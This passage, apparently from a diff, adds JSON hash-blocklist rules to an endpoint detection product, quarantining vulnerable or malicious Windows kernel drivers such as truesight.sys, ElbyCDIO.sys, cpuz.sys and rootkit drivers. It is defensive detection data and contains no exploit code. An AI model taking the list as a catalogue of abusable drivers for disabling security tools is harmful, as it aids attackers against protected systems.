"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488725Z", + "creation_date": "2026-03-23T11:45:31.488727Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "562c8ce6ac6adcce9ae1ff1031ceb230acb2e6db7d4af9ea680ede81ceb993dd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"f43fd366-8964-5767-982e-78384fb87108", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820217Z", + "creation_date": "2026-03-23T11:45:31.820220Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820228Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1aaec14ba263d8950a271f31b4720aa83daba86d0f8d5e8bce4148fe55982599", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f45e8d63-fc62-5ecf-a13e-643b0ddee0b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971731Z", + "creation_date": "2026-03-23T11:45:29.971733Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.971739Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c", + "comment": "PowerTool Hacktool malicious driver (aka kEvP64.sys) [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/HackTool.Win64.ToolPow.A/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4645f32-4986-540d-a2c1-5837d0bae5a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148179Z", + "creation_date": "2026-03-23T11:45:31.148181Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148189Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5456e3d16caf28e4ad56e7c047084d89fbe8c312a4d28abb2ae1a6a1ffd4d8e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f474bf69-81e8-5f7f-a95e-4fd8df201661", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822102Z", + "creation_date": "2026-03-23T11:45:30.822106Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822116Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "694385b46b72e65604afd251fba3c8febb42225343d38feecec3f424ce45f2c3", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f476fc73-6cee-5943-b34a-529baa2637b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973130Z", + "creation_date": "2026-03-23T11:45:29.973132Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973137Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"45b7ec74cc78651975d01d88308f3231df4c96036d6c2273d79f53abdfc8888c", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f48ce149-c36c-51e4-98e7-702e74ad7861", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817408Z", + "creation_date": "2026-03-23T11:45:31.817410Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817416Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2cef3bd693dc86b5962d66e3cdade498143a4d921fdc5d8f823732d02082cae8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f48ec029-8443-580a-81d4-d70d50fb9bb9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, 
+ "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817557Z", + "creation_date": "2026-03-23T11:45:30.817559Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817564Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5bf3985644308662ebfa2fbcc11fb4d3e2a0c817ad3da1a791020f8c8589ebc8", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f48f86bd-2651-5bd3-a0fe-73096c1c7220", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816691Z", + "creation_date": "2026-03-23T11:45:30.816693Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816700Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13ae4d9dcacba8133d8189e59d9352272e15629e6bca580c32aff9810bd96e44", + "comment": "Vulnerable Kernel Driver (aka tdeio64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f493a728-d01e-5af5-a363-17b5365e619f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477083Z", + "creation_date": "2026-03-23T11:45:30.477087Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477096Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9ad7199c00d477ebbc15f2dcf78a6ba60c2670dad0ef0994cebccb19111f890", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f49f5a34-37b6-52f6-8abe-db95642d8fa2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619490Z", + "creation_date": "2026-03-23T11:45:29.619492Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.619498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd", + "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4b57b4c-b90b-5bde-86d4-5ed488cc65ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824294Z", + "creation_date": "2026-03-23T11:45:30.824296Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824301Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d320bae0560a5c14f2b4998930a582a3db9131105c51be8780f3e42eb9c830d6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4c7a4f7-1b43-5f8f-9012-284fda08822a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, 
+ "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458779Z", + "creation_date": "2026-03-23T11:45:30.458782Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.458791Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0174cea1dd70b374f355126ae6be650dff95897d8c8200caac91d4f9e5e5b871", + "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4cb2b6b-efa6-5a95-879d-2183c359003f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620833Z", + "creation_date": "2026-03-23T11:45:29.620835Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620840Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4cbc1c4-729b-5359-a5be-96d316da0087", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821699Z", + "creation_date": "2026-03-23T11:45:30.821702Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "348dc502ac57d7362c7f222e656c52e630c90bef92217a3bd20e49193b5a69f1", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4de6c0a-c86a-546b-9ed0-595abeb61343", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825405Z", + "creation_date": "2026-03-23T11:45:31.825407Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825412Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd6e242ea118af2d1a089ee4013e0b18e62de477d610e47b4aaa551bc708cca4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4e600c5-1431-529c-b5c4-72d5b039ece6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494656Z", + "creation_date": "2026-03-23T11:45:31.494658Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e397c79b7e6ccd146aaca3aed2289677f546176f107dc8d529e6761e58b20bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4eb7494-4c1f-5aa0-93d4-90d1e2422916", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968022Z", + "creation_date": "2026-03-23T11:45:29.968024Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968030Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7da5e6b6212c03d4d862795d05aace1a06db4943489cb639b9ca9a88563c9d0f", + "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4ef332a-7e97-515a-8669-4fc2e214fb22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811081Z", + "creation_date": "2026-03-23T11:45:31.811083Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811088Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "481dc99c83a17b4afeb99597f8aa8c7b61756b3b848c3624741869410d5c9266", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4f71a07-890a-5891-8f59-021885c9402c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479238Z", + "creation_date": "2026-03-23T11:45:31.479242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479252Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ffb536b3fba7aecb5be8b9211a6899e4b3f4cf592d7a8aa0ce7e72f6c95b0f76", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f4f86dc3-3077-5974-81b8-0b95e1367f06", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154960Z", + "creation_date": "2026-03-23T11:45:31.154962Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154968Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d44a12e97d1c9280e460b7172a436f5a72ccd65d9b36b99abf523c1a1f7a3034", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f50dae47-3ead-523b-b8ff-b1cc6af7410c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473659Z", + "creation_date": "2026-03-23T11:45:30.473663Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.473671Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e618c3484111ea363a1ecd2c5f5d4abab13f2f474c870bfa5f6edb98df66f4cc", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5138adc-1798-5a29-a557-c6bd1e9be4fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619507Z", + "creation_date": "2026-03-23T11:45:29.619509Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619514Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5daf5fcf2e234f21d487a696f49410901b417162337052c657fb5fcaffcb771c", + "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f51b4e69-78d0-5ec3-8de6-43be2cdbf4d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827603Z", + "creation_date": "2026-03-23T11:45:31.827605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827610Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29a08f4404060bfe949ba170bd14ecfe63ea36d6c1b95626c4feebd031bbcd9f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f52c0a36-b73b-519c-99ad-a24aa9c8f1d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820777Z", + "creation_date": "2026-03-23T11:45:31.820780Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820789Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
